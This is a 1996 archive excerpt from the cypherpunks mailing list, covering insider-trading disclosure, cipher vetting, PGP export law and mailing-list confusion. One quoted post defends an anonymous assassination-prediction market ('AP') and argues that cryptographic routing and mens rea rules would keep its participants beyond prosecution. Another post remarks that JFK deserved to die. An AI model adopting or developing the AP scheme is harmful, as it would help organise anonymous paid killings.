> > It's widely believed that the New Orleans Mafia (the source of my recent
> > statement about body decomposition in Louisiana swamps) was a prime driver
> > in the assassination of the late President John F. Kennedy.
> >
> > I think it's fairly safe to say that having done this didn't do them a
> > damn bit of good. It didn't do anyone else a damn bit of good.
>
> JFK deserved to die.
>

While I neither agree nor disagree with your point, it does seem a bit irrelevant, but that's just MHO.

--Deviant

If you look rather casual with the knife when you flick it open, people don't like it. -- Gerry Youghkins

From unicorn at schloss.li Wed Sep 25 20:44:52 1996
From: unicorn at schloss.li (Black Unicorn)
Date: Thu, 26 Sep 1996 11:44:52 +0800
Subject: Insider Trading - What constitutes "Disclosure" ?
Message-ID:

This is not legal advice. You got it for free.

Often the choice faced by the investor who has material non-public information is characterized as "disclose or abstain," meaning that the investor may either trade after disclosing or abstain from trading on the information.

A few people have asked me what constitutes disclosure.

I've not researched the latest cases, but the generally accepted "best description" can be found in SEC v. Texas Gulf Sulphur Co., 401 F.2d 833 (2d Cir.1968), cert. denied.

As to the defense's claim that their purchases of stock were not proscribed because the news had effectively been disclosed, the court offered: (errors mine)

Crawford (defendant) telephoned his orders to his Chicago broker about midnight on April 15 and again at 8:30 in the morning of the 16th, with instructions to buy at the opening of the Midwest Stock Exchange. The trial court's finding that "he sought to, and did, 'beat the news,'" 258 F.Supp. at 287, is well documented by the record. The rumors of a major ore strike which had been circulated in Canada and, to a lesser extent, in New York, had been disclaimed by the TGS press release of April 12, which significantly promised the public an official detailed announcement when possibilities had ripened into actualities. The abbreviated announcement to the Canadian press at 9:40 A.M. on the 16th by the Ontario Minister of Mines and the report carried by the Northern Miner, parts of which had sporadically reached New York on the morning of the 16th through reports from Canadian affiliates to a few New York investment firms, are assuredly not the equivalent of the official 10-15 minute announcement which was not released to the American financial press until after 10:00 AM. Crawford's orders had been placed before that. **Before insiders may act upon material information, such information must have been effectively disclosed in a manner sufficient to insure its availability to the investing public.** Particularly here, where a formal announcement to the entire financial news media had been promised in a prior official release known to the media, all insider activity must await dissemination of the promised official announcement.

Coates was absolved by the court below because his telephone order was placed shortly before 10:20 AM on April 16, which was after the announcement had been made public even though the news could not be considered already a matter of public information. 258 F.Supp at 288. This result seems to have been predicated upon a misinterpretation of dicta in Cady, Roberts, where the SEC instructed insiders to "keep out of the market until the established procedures for public release of the information are carried out instead of hastening to execute transactions in advance of, and in frustration of, the objectives of the release," 40 S.E.C. at 915. The reading of a news release, which prompted Coates into action, is merely the first step in the process of dissemination required for compliance with the regulatory objective of providing all investors with an equal opportunity to make informed investment judgements. Assuming that the contents of the official release could have been instantaneously acted upon, at the minimum Coates should have waited until the news could reasonably have been expected to appear over the media of widest circulation, the Dow Jones broad tape, rather than hastening to insure an advantage to himself and his broker son-in-law.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn at schloss.li

From unicorn at schloss.li Wed Sep 25 20:53:00 1996
From: unicorn at schloss.li (Black Unicorn)
Date: Thu, 26 Sep 1996 11:53:00 +0800
Subject: Possible snake oil?
In-Reply-To:
Message-ID:

On Wed, 25 Sep 1996, Phil Fraering wrote:

>
> I ran across this at the web site of a New Orleans area web authoring
> company. I checked with a friend of mine of long standing on this list,
> and he assured me that the information was probably false.
>
> (Here it is...)
>
> > [deleted] has one of the fastest and most powerful web networks in the

[...]

> ObLegalQuestion:
>
> Should I have been less coy about the corporation name?

It is their publication. Why should you be afraid of copying it? So long as you don't make allegations that are malicious.

>
>
> Phil Fraering The above is the opinion of neither my internet
> pgf at acadian.net service provider nor my employer.
> 318/261-9649 > > -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From adam at homeport.org Wed Sep 25 21:14:57 1996 From: adam at homeport.org (Adam Shostack) Date: Thu, 26 Sep 1996 12:14:57 +0800 Subject: PGP plugin for Netscape? Message-ID: <199609260237.VAA02054@homeport.org> I could swear I read something about a PGP plugin called livepgp, and Altavista can't find it, and I can't glimpse it in my archives of the list. Anyone got a pointer? Please post to the list; making it more likely that a search engine will find this in the future, and we won't get a rash of 'me toos.' Thanks, Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From jimbell at pacifier.com Wed Sep 25 21:30:55 1996 From: jimbell at pacifier.com (jim bell) Date: Thu, 26 Sep 1996 12:30:55 +0800 Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE] Message-ID: <199609260141.SAA15334@mail.pacifier.com> At 07:24 AM 9/24/96 -0700, Dale Thorn wrote: >Lessee if I have this right, now. We have basically three scenarios: > >1. Allow the status quo to continue (the justice system scam now run by > Janet Reno/Louis Freeh types et al. >2. Allow the people some democracy in applying justice through AP. >3. Sometime in the future, build the Gort(?) robots, as in The Day The > Earth Stood Still, and let them do the job. > >Whatcha think? That's about it. I long ago noticed the similarity between AP and the fictional Gort. Problem is, Gort would have to be programmed. How would you write such a program? Governments would want their hand in it. They'd insist on "government exceptions" to rules, like: "All violence is forbiddden! (except for violence by duly authorized government employees!)" Not very practical. Jim Bell jimbell at pacifier.com From declan at well.com Wed Sep 25 21:40:32 1996 From: declan at well.com (Declan McCullagh) Date: Thu, 26 Sep 1996 12:40:32 +0800 Subject: Lexis and Privacy - Bill approaches. 
In-Reply-To: <960925181309_529562745@emout02.mail.aol.com> Message-ID: Dear PhneCards, Please stop using my email address as part of an inappropriate email bomb. If this continues, I will be forced to persecute your return email address. Now we don't want that to happen, do we? -Declan On Wed, 25 Sep 1996 PhneCards at aol.com wrote: > Date: Wed, 25 Sep 1996 18:13:24 -0400 > From: PhneCards at aol.com > To: declan at eff.org, cypherpunks at toad.com > Subject: Re: Lexis and Privacy - Bill approaches. > > Did you know this company is using your email address as part of > an unlawful email bomb? > > I would advise you to write to them at cypherpunks at toad.com > and owner-cypherpunks at toad.com and advise them to stop > using your email address for this type of activity. > > It is illegal to use a invalid return email address. If this continues, I > will > be forced to prosecute the return email address - which they are > making to look like you. > > Below is the letter that I received in my email box > ================================================= > > In a message dated 96-09-25 15:12:13 EDT, you write: > > >Subj: Re: Lexis and Privacy - Bill approaches. > >Date: 96-09-25 15:12:13 EDT > >From: declan at eff.org (Declan McCullagh) > >Sender: owner-cypherpunks at toad.com > >To: unicorn at schloss.li (Black Unicorn) > >CC: cypherpunks at toad.com > > > >This would be good if the bills were written well and thoughtfully. > >Unfortunately, they explicitly extend executive branch regulatory > >jurisdiction to the Net. At least the one I read did; I understand there > >are multiple versions. 
> > > >-Declan > > > > > >On Tue, 24 Sep 1996, Black Unicorn wrote: > > > >> > >> Pressure from the FTC Which fielded hundreds of complaints about Lexis and > >> the social security number scrap) has prompted members of the Banking > >> Committee to add provisions to the most recent spending bills which > >> protect personal information (including social security numbers, phone > >> numbers, addresses, and so forth) under the Fair Credit Reporting Act. > >> This limits access to this information to credit agencies and otherwise > >> authorized entities. (Of which I assume Lexis is not one). > >> > >> It's not great protection, but it's something. > >> > >> I urge everyone to take their own measures to protect personal data > >> regardless of what some piece of paper on a library shelf says is > >> protected. The only real protection is not to allow release of the data > >> in the first place. > >> > >> -- > >> I hate lightning - finger for public key - Vote Monarchist > >> unicorn at schloss.li > >> > > > > > >// declan at eff.org // I do not represent the EFF // declan at well.com // > > > > > > > > > >----------------------- Headers -------------------------------- > >From cypherpunks-errors at toad.com Wed Sep 25 15:11:39 1996 > >Return-Path: cypherpunks-errors at toad.com > >Received: from mailhub.MyMail.Com (mailhub.mymail.com [206.247.118.1]) by > >emin14.mail.aol.com (8.6.12/8.6.12) with SMTP id PAA10310 for > >; Wed, 25 Sep 1996 15:11:34 -0400 > >Received: from toad.com by mailhub.MyMail.Com (5.x/SMI-SVR4) > > id AA27335; Wed, 25 Sep 1996 13:11:11 -0600 > >Received: (from majordom at localhost) by toad.com (8.7.5/8.7.3) id FAA15636 > for > >cypherpunks-outgoing; Wed, 25 Sep 1996 05:06:43 -0700 (PDT) > >Received: from eff.org (declan at eff.org [204.253.162.3]) by toad.com > >(8.7.5/8.7.3) with ESMTP id FAA15631 for ; Wed, 25 Sep > >1996 05:06:39 -0700 (PDT) > >Received: (from declan at localhost) by eff.org (8.7.5/8.6.6) id FAA10228; Wed, > >25 Sep 1996 
05:06:38 -0700 (PDT) > >Date: Wed, 25 Sep 1996 05:06:38 -0700 (PDT) > >From: Declan McCullagh > >To: Black Unicorn > >Cc: cypherpunks at toad.com > >Subject: Re: Lexis and Privacy - Bill approaches. > >In-Reply-To: > >Message-Id: > >Mime-Version: 1.0 > >Content-Type: TEXT/PLAIN; charset=US-ASCII > >Sender: owner-cypherpunks at toad.com > >Precedence: bulk > > > From deviant at pooh-corner.com Wed Sep 25 21:40:42 1996 From: deviant at pooh-corner.com (The Deviant) Date: Thu, 26 Sep 1996 12:40:42 +0800 Subject: Possible snake oil? In-Reply-To: Message-ID: On Wed, 25 Sep 1996, Phil Fraering wrote: > Date: Wed, 25 Sep 1996 16:00:40 -0500 (CDT) > From: Phil Fraering > To: cypherpunks at toad.com > Subject: Possible snake oil? > [Actual post deleted] > > ObLegalQuestion: > > Should I have been less coy about the corporation name? > > It won't make a difference either way: if the company does care, it takes all of 10 seconds to prove that the message could have been fakemailed anyway... As to whether or not they'd have grounds, no, they wouldn't, assuming you didn't actually edit the quote, and assuming you didn't (and you didn't) actually accuse them of anything. You merely questioned if they were correct, and if so, how so... which is perfectly innocent. --Deviant Talking much about oneself can also be a means to conceal oneself. -- Friedrich Nietzsche From erp at digiforest.com Wed Sep 25 21:44:13 1996 From: erp at digiforest.com (Jay Gairson) Date: Thu, 26 Sep 1996 12:44:13 +0800 Subject: Public Schools In-Reply-To: Message-ID: > Nothing, but Dmitri has "different" standards of what is list-relevant than > many of us do. Ok, just wondering on that *shrug*. > > >So, basically you're saying, since my parents cannot afford to pay for a > >private school for me, we are genetically inferior to those who can? > >Because hate tell ya, but I've ran into some major idiots that go to > >private schools. 
Also to consider that from the school I go to, last > >year we had two perfect sat scores (no problems missed). > > A minor point: An 800 SAT or Achievement score does _not_ mean "no problems > missed." There is some threshold for the percentage of right answers, which > varies from year to year and from test to test, above which the score is > marked "800." Don't ask me why they do this. (*) They did it because, the American students, were scoring worse than the Japanese students. And the with the 1600 they got a copy of the questions and answers, and the questions they missed, they didn't miss any. So... > > This should give you more hope and more determination to get a few 800s > when you take the exams. > Should, doesn't much, but should. > range (x10, of course). Of course, as Roger Gregory puts it, "Mensa is the > scum of the cream of the crop.") And he is partially right on that >) almost wholly.. But I know some non scum that are so *shrug* ok buh bye Erp From PhneCards at aol.com Wed Sep 25 22:09:17 1996 From: PhneCards at aol.com (PhneCards at aol.com) Date: Thu, 26 Sep 1996 13:09:17 +0800 Subject: An idle thought on CBC and block lengths Message-ID: <960925181213_529562658@emout15.mail.aol.com> Did you know this company is using your email address as part of an unlawful email bomb? I would advise you to write to them at cypherpunks at toad.com and owner-cypherpunks at toad.com and advise them to stop using your email address for this type of activity. It is illegal to use an invalid return email address. If this continues, I will be forced to prosecute the return email address - which they are making to look like you. 
Below is the letter that I received in my email box ================================================= In a message dated 96-09-25 15:52:17 EDT, you write: >Subj: An idle thought on CBC and block lengths >Date: 96-09-25 15:52:17 EDT >From: osborne at gateway.grumman.com (Rick Osborne) >Sender: owner-cypherpunks at toad.com >To: cypherpunks at toad.com > >So I was sitting bored at home and thinking to myself: CBC is cool. >Without the key, you're screwed because a single bit error propagates >throughout the entire message. But then I was thinking, yeah, but you can >still eventually get the ONE key. So I began to wonder what the difference >in security is between encrypting an entire M with just one K in CBC, or >encrypting M with permutations of K over specific block lengths. > >On the one hand you've got just one key, which makes it that much harder to >find in the keyspace. On the other hand, If evil interloper Eve gets her >hands it, she has to find all of the keys to get all of M. (Assuming she >is using brute force and can't necessarily find the master K to permute >into the subkeys.) > >The downsides are of course that on the one side you've got just one key, >and once you get it, you get M. But on the other hand, you can get any one >part of the message with less difficulty because of the higher number of >keys. And, of course, if your master K is easy to brute force, then it's >actually worse than the first option. > >Does anyone have opinions / knowledge of which is better? > > >____________________________________________________________ >Rick Osborne osborne at gateway.grumman.com >"The universe doesn't give you any points for doing things that are easy." 
> > > >----------------------- Headers -------------------------------- >From cypherpunks-errors at toad.com Wed Sep 25 15:51:46 1996 >Return-Path: cypherpunks-errors at toad.com >Received: from mailhub.MyMail.Com (mailhub.mymail.com [206.247.118.1]) by >emin14.mail.aol.com (8.6.12/8.6.12) with SMTP id PAA04207 for >; Wed, 25 Sep 1996 15:51:43 -0400 >Received: from toad.com by mailhub.MyMail.Com (5.x/SMI-SVR4) > id AA27411; Wed, 25 Sep 1996 13:47:22 -0600 >Received: (from majordom at localhost) by toad.com (8.7.5/8.7.3) id FAA16059 for >cypherpunks-outgoing; Wed, 25 Sep 1996 05:57:39 -0700 (PDT) >Received: from gateway.grumman.com (gateway.grumman.com [192.86.71.8]) by >toad.com (8.7.5/8.7.3) with SMTP id FAA16054 for ; Wed, >25 Sep 1996 05:57:32 -0700 (PDT) >Message-Id: <3.0b19.32.19960925085644.0068cb90 at gateway.grumman.com> >X-Sender: osborne at gateway.grumman.com >X-Mailer: Windows Eudora Pro Version 3.0b19 (32) >Date: Wed, 25 Sep 1996 08:56:45 -0400 >To: cypherpunks at toad.com >From: Rick Osborne >Subject: An idle thought on CBC and block lengths >Mime-Version: 1.0 >Content-Type: text/plain; charset="us-ascii" >Sender: owner-cypherpunks at toad.com >Precedence: bulk From markm at voicenet.com Wed Sep 25 22:14:16 1996 From: markm at voicenet.com (Mark M.) Date: Thu, 26 Sep 1996 13:14:16 +0800 Subject: Newsgroup proposal: misc.anonymous Message-ID: -----BEGIN PGP SIGNED MESSAGE----- In an effort to get anonymity and message pools more widespread, I think it would be a good idea to establish a newsgroup for anonymous message pools that would get the same distribution as any other newsgroup in the "big 8". The "misc" hierarchy is probably the best place for such a newsgroup since it already carries groups like "misc.misc" and "misc.test". Does anyone have any suggestions or objections? Mark - -- PGP encrypted mail prefered. 
Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ -----BEGIN PGP SIGNATURE----- Version: 2.6.3 Charset: noconv -----END PGP SIGNATURE----- From PhneCards at aol.com Wed Sep 25 22:32:48 1996 From: PhneCards at aol.com (PhneCards at aol.com) Date: Thu, 26 Sep 1996 13:32:48 +0800 Subject: Hallam-Baker demands more repudiations or he'll write! Message-ID: <960925181241_529563116@emout20.mail.aol.com> Did you know this company is using your email address as part of an unlawful email bomb? I would advise you to write to them at cypherpunks at toad.com and owner-cypherpunks at toad.com and advise them to stop using your email address for this type of activity. It is illegal to use a invalid return email address. If this continues, I will be forced to prosecute the return email address - which they are making to look like you. Below is the letter that I received in my email box ================================================= In a message dated 96-09-25 14:05:23 EDT, you write: >Subj: Re: Hallam-Baker demands more repudiations or he'll write! >Date: 96-09-25 14:05:23 EDT >From: jimbell at pacifier.com (jim bell) >Sender: owner-cypherpunks at toad.com >To: bdavis at thepoint.net (Brian Davis) >CC: cypherpunks at toad.com, jf_avon at citenet.net > >At 11:50 PM 9/24/96 -0400, Brian Davis wrote: >>On Tue, 24 Sep 1996, Rich Burroughs wrote: >> >>> >>> Anyone who mistakes the lack of "repudiations" for AP on the list for some >>> kind of tacit approval is not getting the whole picture, IMHO. 
>>> >>> Is this how journalists do their research nowadays -- "give me some info >or >>> I'll write something really bad about you that you'll regret?" Cool. I >>> guess I thought there might still be some kind of pursuit of the truth >>> involved. >>> >>> I personally don't have the time or energy to contribute to the AP >threads. >>> That != approval for the idea. >>> >>> I hope you include your above quote in your piece. >>> >> >>Amen to that. Add that at least one lawyer (and former prosecutor) on >>the list is confident that successful prosecutions will ensue is AP ever >>gets off the ground. > >I don't doubt that there will be harassment. (you can't deny that charges >would be brought even if it is tacitly agreed that no crime has been >committed; "the harassment-value" of such a prosecution would be desired >even if there is ultimately an acquittal.) AP will resemble, more than >anything, gambling. While gambling is illegal in some areas, it is quite >legal in others and there is no reason to believe that locales can't be >found in which an AP system could operate legally. > >Make American laws apply everywhere? That'll be hard to justify, unless you >want to unleash a world where an all people can be subject simultaneously to >the laws of EVERY country, should they choose to enforce them! Would you >like to be arrested in Red China for something you said years earlier in >America about their leadership? > > And are you ignoring the fact that the intentional isolation of one >participant from the knowledge of the actions and even the identity of the >others makes opportunities for prosecution on "conspiracy" charges mighty >slim. 
And since AP can operate across traditional jurisdictional >boundaries, you're going to have to explain how you can prosecute Person A >in Country B for giving a donation to an organization in Country C, to be >paid to a person D in country E for correctly predicting the death of person >F in country G, particularly when none of the identities of these people or >countries can be easily known given a well-crafted cryptographic and >message-routing system. > > Further, as you probably know as well as any, in order (at least, >supposedly!) to get a conviction you need to prove "mens rea," or "guilty >mind," and I suggest that none of the more passive participants in the AP >system have that. (The ones who DON'T pick up a gun, knife, bomb, poison, >etc.) Sure, they are aware that somewhere, sometime, somebody _may_ commit >a crime in order to collect a lottery, but they don't know who, what, when, >where, or how this will occur, if at all. (either before or after the fact!) > In fact, since it is possible for a target to collect the reward himself >(to be directed toward his designee, obviously) by committing suicide and >"predicting" it, it isn't certain to the other participants that there has >even been any sort of crime committed! > >Based on the mens rea requirement, I propose that there is plenty of room >for most of the participants to reasonably claim that they are guilty of no >crime. They have carefully shielded themselves and others from any guilty >knowledge, and presumably they are entitled to protect themselves in this >way. Morally, you could argue that these people are countenancing something >nasty, in the same sense that somebody could equally well argue that if you >buy a cheap shirt in Walmart you're partly responsible for sweatshop labor >in El Salvador. True, I suppose, but moral guilt does not always translate >into legal guilt. > > >> And yes, I've read Jim Bell's manifesto. 
The fact >>that no lawyer has dissected it from a legal standpoint has been used by >>Mr. Bell as support for the propostion that it is legal. > >I suggest that there is a greater likelihood that the "powers that be" will >just abandon all pretense of legality, and attempt to strike at the >participants if they can find them without benefit of any sort of trial. >This is a more plausible conclusion, because it cuts through all of the >legal difficulties which would hinder prosecution. In effect, a low-level >undeclared war. > > >Jim Bell >jimbell at pacifier.com > > >----------------------- Headers -------------------------------- >From cypherpunks-errors at toad.com Wed Sep 25 11:04:24 1996 >Return-Path: cypherpunks-errors at toad.com >Received: from mailhub.MyMail.Com (mailhub.mymail.com [206.247.118.1]) by >emin14.mail.aol.com (8.6.12/8.6.12) with SMTP id LAA03061 for >; Wed, 25 Sep 1996 11:04:18 -0400 >Received: from toad.com by mailhub.MyMail.Com (5.x/SMI-SVR4) > id AA26654; Wed, 25 Sep 1996 09:04:05 -0600 >Received: (from majordom at localhost) by toad.com (8.7.5/8.7.3) id AAA10103 for >cypherpunks-outgoing; Wed, 25 Sep 1996 00:55:24 -0700 (PDT) >Received: from mail.pacifier.com (root at mail.pacifier.com [199.2.117.164]) by >toad.com (8.7.5/8.7.3) with ESMTP id AAA10098 for ; >Wed, 25 Sep 1996 00:55:16 -0700 (PDT) >Received: from ip20.van1.pacifier.com (ip20.van1.pacifier.com [206.163.4.20]) >by mail.pacifier.com (8.7.6-pac/8.7.3) with SMTP id AAA14065; Wed, 25 Sep >1996 00:55:14 -0700 (PDT) >Message-Id: <199609250755.AAA14065 at mail.pacifier.com> >X-Sender: jimbell at mail.pacifier.com >X-Mailer: Windows Eudora Light Version 1.5.2 >Mime-Version: 1.0 >Content-Type: text/plain; charset="us-ascii" >Date: Wed, 25 Sep 1996 00:55:21 -0800 >To: Brian Davis >From: jim bell >Subject: Re: Hallam-Baker demands more repudiations or he'll write! 
>Cc: cypherpunks at toad.com, jf_avon at citenet.net >Sender: owner-cypherpunks at toad.com >Precedence: bulk From PhneCards at aol.com Wed Sep 25 22:33:47 1996 From: PhneCards at aol.com (PhneCards at aol.com) Date: Thu, 26 Sep 1996 13:33:47 +0800 Subject: Lexis and Privacy - Bill approaches. Message-ID: <960925181309_529562745@emout02.mail.aol.com> Did you know this company is using your email address as part of an unlawful email bomb? I would advise you to write to them at cypherpunks at toad.com and owner-cypherpunks at toad.com and advise them to stop using your email address for this type of activity. It is illegal to use a invalid return email address. If this continues, I will be forced to prosecute the return email address - which they are making to look like you. Below is the letter that I received in my email box ================================================= In a message dated 96-09-25 15:12:13 EDT, you write: >Subj: Re: Lexis and Privacy - Bill approaches. >Date: 96-09-25 15:12:13 EDT >From: declan at eff.org (Declan McCullagh) >Sender: owner-cypherpunks at toad.com >To: unicorn at schloss.li (Black Unicorn) >CC: cypherpunks at toad.com > >This would be good if the bills were written well and thoughtfully. >Unfortunately, they explicitly extend executive branch regulatory >jurisdiction to the Net. At least the one I read did; I understand there >are multiple versions. > >-Declan > > >On Tue, 24 Sep 1996, Black Unicorn wrote: > >> >> Pressure from the FTC Which fielded hundreds of complaints about Lexis and >> the social security number scrap) has prompted members of the Banking >> Committee to add provisions to the most recent spending bills which >> protect personal information (including social security numbers, phone >> numbers, addresses, and so forth) under the Fair Credit Reporting Act. >> This limits access to this information to credit agencies and otherwise >> authorized entities. (Of which I assume Lexis is not one). 
>> >> It's not great protection, but it's something. >> >> I urge everyone to take their own measures to protect personal data >> regardless of what some piece of paper on a library shelf says is >> protected. The only real protection is not to allow release of the data >> in the first place. >> >> -- >> I hate lightning - finger for public key - Vote Monarchist >> unicorn at schloss.li >> > > >// declan at eff.org // I do not represent the EFF // declan at well.com // > > > > >----------------------- Headers -------------------------------- >From cypherpunks-errors at toad.com Wed Sep 25 15:11:39 1996 >Return-Path: cypherpunks-errors at toad.com >Received: from mailhub.MyMail.Com (mailhub.mymail.com [206.247.118.1]) by >emin14.mail.aol.com (8.6.12/8.6.12) with SMTP id PAA10310 for >; Wed, 25 Sep 1996 15:11:34 -0400 >Received: from toad.com by mailhub.MyMail.Com (5.x/SMI-SVR4) > id AA27335; Wed, 25 Sep 1996 13:11:11 -0600 >Received: (from majordom at localhost) by toad.com (8.7.5/8.7.3) id FAA15636 for >cypherpunks-outgoing; Wed, 25 Sep 1996 05:06:43 -0700 (PDT) >Received: from eff.org (declan at eff.org [204.253.162.3]) by toad.com >(8.7.5/8.7.3) with ESMTP id FAA15631 for ; Wed, 25 Sep >1996 05:06:39 -0700 (PDT) >Received: (from declan at localhost) by eff.org (8.7.5/8.6.6) id FAA10228; Wed, >25 Sep 1996 05:06:38 -0700 (PDT) >Date: Wed, 25 Sep 1996 05:06:38 -0700 (PDT) >From: Declan McCullagh >To: Black Unicorn >Cc: cypherpunks at toad.com >Subject: Re: Lexis and Privacy - Bill approaches. >In-Reply-To: >Message-Id: >Mime-Version: 1.0 >Content-Type: TEXT/PLAIN; charset=US-ASCII >Sender: owner-cypherpunks at toad.com >Precedence: bulk From tcmay at got.net Wed Sep 25 22:38:27 1996 From: tcmay at got.net (Timothy C. 
May) Date: Thu, 26 Sep 1996 13:38:27 +0800 Subject: "Confessing to a felony" Message-ID: At 2:03 AM 9/26/96, Black Unicorn wrote: >On Wed, 25 Sep 1996, Igor Chudov @ home wrote: > >> > >> Soon I am going to be going overseas to Japan, and I want to take >> > >> my notebook with me so I can keep up with everything, however, I have >> > >> encrypted my hard drive and usually encrypt my mail. Is this in >> > >> violation of the ITAR to keep everything the same when I go over? >> >> Gentlemen, us customs does not give shit about what you take out >> on your diskettes. >> >> When I went to Russia recenty, I took PGP for DOS, and no one gave >> me any problem. >> >> IANAL > >Obviously not, you've just confessed to a felony. So? "Confessing to a felony" is meaningless, as I understand things. While BU is a lawyer, and I am not, I maintain "confessing to a felony" is meaningless without several necessary factors: a. interest by law enforcement that a crime has been committed and needs to be prosecuted b. evidence that the "confession" can be backed up by other evidence c. common sense Thus, if even former prosecutor Brian Davis, when he was a prosecutor, were to have "confessed to a felony" (for example, saying a bad word on a forum where minors might be present, under the CDA, and before it was put on semi-hold), his colleagues would just have snickered, thinking him crazy. As to the felony status of taking PGP to Russia, I think it's not a felony. The "personal use" exemption in the ITARs certainly makes taking PGP to _Western_ Europe an OK thing. Whether Russia is still considered to be worthy of an "exemption to the exemption," as it were, is unclear to me. Mostly, I think U.S. Customs doesn't care. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. 
May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From tcmay at got.net Wed Sep 25 22:47:51 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 26 Sep 1996 13:47:51 +0800 Subject: Public Schools Message-ID: At 11:40 PM 9/25/96, Jay Gairson wrote: >> A minor point: An 800 SAT or Achievement score does _not_ mean "no problems >> missed." There is some threshold for the percentage of right answers, which >> varies from year to year and from test to test, above which the score is >> marked "800." Don't ask me why they do this. (*) > >They did it because, the American students, were scoring worse than the >Japanese students. And the with the 1600 they got a copy of the >questions and answers, and the questions they missed, they didn't miss any. >So... Nonsense. Japanese students were not taking the CEEB and SAT tests in the 1950s, when the test methodologies were established. (As a point of fact, the Japanese have their own grueling exams, which bear no resemblance to the CEEB and SAT tests.) Nor was the number of Japanese-American students taking the test sufficiently plentiful in the 1950s and 60s to affect the methodology. So, this is your chance to present your evidence that the scoring methodology was changed in response to Japanese students doing better than American students. >ok >buh bye > >Erp On second thought.... --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. 
May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From frantz at netcom.com Wed Sep 25 22:54:50 1996 From: frantz at netcom.com (Bill Frantz) Date: Thu, 26 Sep 1996 13:54:50 +0800 Subject: Mitsubishi MISTY LSI Message-ID: <199609260351.UAA02953@netcom8.netcom.com> > Nikkei English News, 24 September 1996. > > [Mitsubishi] fabricated the chip as a gate array using a > 0.5 micron CMOS process and its own proprietary > encryption algorithm MISTY. Operating at a maximum > input/output speed of 40 megahertz, the chip can handle > 32 bits per clock cycle. Does anyone have a reason not to consider this algorithm snake oil? e.g.: Was it developed by a well known cryptographer? Has it been vetted by someone/some organization with reputation? I other words, why should we trust it? ------------------------------------------------------------------------- Bill Frantz | "Cave softly, cave safely, | Periwinkle -- Consulting (408)356-8506 | and cave with duct tape." | 16345 Englewood Ave. frantz at netcom.com | - Marianne Russo | Los Gatos, CA 95032, USA From frantz at netcom.com Wed Sep 25 22:55:29 1996 From: frantz at netcom.com (Bill Frantz) Date: Thu, 26 Sep 1996 13:55:29 +0800 Subject: Private Information Retrieval Message-ID: <199609260351.UAA02957@netcom8.netcom.com> At 6:11 PM 9/25/96 -0400, PhneCards at aol.com wrote: >Did you know this company is using your email address as part of >an unlawful email bomb? As part of helping you get a clue about how the net works, I offer you the following information: You have been subscribed to a long-standing Internet mailing list. Mailing lists are also called a mail exploders because any mail sent to them is resent to all the subscribers. 
You should have gotten instructions on unsubscribing when you were subscribed. If you have lost them, Tim May has kindly given you and others in your situation some useful hints: >Send the correct word to the correct address, stated often here, and you >will be unsubscribed. > >--Tim May > > >(Hint: majordomo at toad.com, with message body of "unsubscribe cypherpunks" >(no quotes)) > Note that this is not a mail bomb attack. Each message is different and there are only about 100 of them of a normal day. ------------------------------------------------------------------------- Bill Frantz | "Cave softly, cave safely, | Periwinkle -- Consulting (408)356-8506 | and cave with duct tape." | 16345 Englewood Ave. frantz at netcom.com | - Marianne Russo | Los Gatos, CA 95032, USA From tcmay at got.net Wed Sep 25 23:09:02 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 26 Sep 1996 14:09:02 +0800 Subject: Lexis and Privacy - Bill approaches. Message-ID: Stop sending me messages like this. This is getting annoying. --TCM At 10:13 PM 9/25/96, PhneCards at aol.com wrote: >Did you know this company is using your email address as part of >an unlawful email bomb? > >I would advise you to write to them at cypherpunks at toad.com >and owner-cypherpunks at toad.com and advise them to stop >using your email address for this type of activity. > >It is illegal to use a invalid return email address. If this continues, I >will >be forced to prosecute the return email address - which they are >making to look like you. > >Below is the letter that I received in my email box >================================================= > >In a message dated 96-09-25 15:12:13 EDT, you write: > >>Subj: Re: Lexis and Privacy - Bill approaches. 
>>Date: 96-09-25 15:12:13 EDT >>From: declan at eff.org (Declan McCullagh) >>Sender: owner-cypherpunks at toad.com >>To: unicorn at schloss.li (Black Unicorn) >>CC: cypherpunks at toad.com >> >>This would be good if the bills were written well and thoughtfully. >>Unfortunately, they explicitly extend executive branch regulatory >>jurisdiction to the Net. At least the one I read did; I understand there >>are multiple versions. >> >>-Declan >> >> >>On Tue, 24 Sep 1996, Black Unicorn wrote: >> >>> >>> Pressure from the FTC Which fielded hundreds of complaints about Lexis and >>> the social security number scrap) has prompted members of the Banking >>> Committee to add provisions to the most recent spending bills which >>> protect personal information (including social security numbers, phone >>> numbers, addresses, and so forth) under the Fair Credit Reporting Act. >>> This limits access to this information to credit agencies and otherwise >>> authorized entities. (Of which I assume Lexis is not one). >>> >>> It's not great protection, but it's something. >>> >>> I urge everyone to take their own measures to protect personal data >>> regardless of what some piece of paper on a library shelf says is >>> protected. The only real protection is not to allow release of the data >>> in the first place. 
